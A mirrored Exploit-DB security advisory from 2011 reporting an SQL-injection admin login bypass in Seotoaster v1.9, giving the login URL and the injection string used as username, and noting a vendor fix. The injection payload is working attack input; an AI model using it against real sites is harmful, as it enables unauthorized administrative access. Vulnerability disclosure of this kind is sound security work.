Seotoaster – SQL Injection

  • 作者: Stefan Schurtz
    日期: 2011-12-16
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/18246/
  • #################################################################################
# Advisory:		Seotoaster SQL-Injection Admin Login Bypass
# Author: 		Stefan Schurtz
# Contact:		sschurtz@t-online.de
# Affected Software:	Successfully tested on Seotoaster v.1.9
# Vendor URL: 	http://www.seotoaster.com/
# Vendor Status:	fixed
#################################################################################

==========================
Vulnerability Description
==========================

Seotoaster v.1.9 is prone to an SQL-Injection which bypass the admin login

==================
PoC-Exploit
==================

http://<target>/seotoaster/go
or
http://<target>/go

User: ' or 1=1)#
PW: notimportant

=========
Solution
=========

Upgrade to the latest version

========
Credits
========

Vulnerabilitiy found and advisory written by Stefan Schurtz

===========
References
===========

http://secunia.com/advisories/46881/
    Python